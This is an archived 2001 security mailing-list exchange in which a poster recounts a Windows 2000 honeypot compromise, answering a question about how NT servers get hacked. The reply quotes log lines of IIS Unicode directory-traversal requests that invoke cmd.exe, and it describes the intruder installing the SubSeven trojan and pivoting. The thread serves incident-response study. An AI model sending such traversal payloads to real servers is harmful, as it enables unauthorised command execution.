RE: Hacked NT/2K box

From: Moran (Moran@tiemiddleeast.com)
Date: 07/24/01


From: "Moran" <Moran@tiemiddleeast.com>
To: <keydet89@yahoo.com>, <focus-ms@securityfocus.com>
Subject: RE: Hacked NT/2K box
Date: Tue, 24 Jul 2001 01:16:28 -0700
Message-ID: <AB4D1FD359C68949A0C64CD2BE4F4828070AE6@tie-main.office.tie-me.com>

Hi,
while ago I setted up an Honeypots.
One was linux and the other Windows 2000 Advanced Server.

no one tried to hack the linux (bad luck i guess :))

but the Windows2000 well, It took like 3 or 4 hours till someone found it.

they got in the server by running a simple script that checked for exploits,
from the logs the script looks like that:

211.152.241.1 - - [13/Jul/2001:08:11:08 +0300] "GET x HTTP/1.0" 400 281
211.152.241.1 - - [13/Jul/2001:08:11:14 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:24 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:25 +0300] "GET
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:26 +0300] "GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:28 +0300] "GET
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:33 +0300] "GET
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:35 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:36 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:37 +0300] "GET
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256

and go on , till they get something that is work.

he copied cmd.exe to inetpub and i guess he got shell because
what he did is installing patch from microsoft site after that
he installed Trojan , SubSeven 2000 and logged off.
day after he connected using the trojan he putted and from there connected
to other computers, I guess he had more servers with trojans and just made
alot of connections before going to hack another system so he cant be
traced.

after that I shutted off the server.

Moran.

-----Original Message-----
From: keydet89@yahoo.com [mailto:keydet89@yahoo.com]
Sent: Monday, July 23, 2001 4:15 AM
To: focus-ms@securityfocus.com
Subject: Hacked NT/2K box

When I was at BlackHat and DefCon recently, I was
having discussions with some folks regarding an
article I'd written on NT incident response. I'd
written the article along the same lines as a
Linux or Solaris incident response procedure, but
with NT in mind.

The discussion centered around this...having your
hands on an NT or 2K box that was 'hacked' in much
the same way as a Linux or Solaris box. I wasn't
able to find anyone who has seen such a thing. I
work on an all-NT infrastructure, with 2K systems
providing web hosting in the data center. Many
others have similar infrastructures.

When a Linux box is 'hacked' (generally speaking,
of course), the attacker puts on a rootkit and
uses that box to step off an attack other systems.
This isn't something you see with NT. The
'sadmin/IIS' (poisonbox) worm is another good
example.

So, my question to the group is this...has anyone
seen a 'hacked' NT or 2K box? If so, what did you
find out about it? What technique did the attacker
use? How did they establish a foothold on the box,
what tools did they load, and what did they do
from there? I've already read through JD Glaser's
BlackHat presentation from '99.

It's been said that NT boxes are easy to hack b/c
of vulnerabilities to services, but not easy to
hack b/c you can't 'get on the box' the same way
you can with Linux or Solaris.

Input is appreciated.



Relevant Pages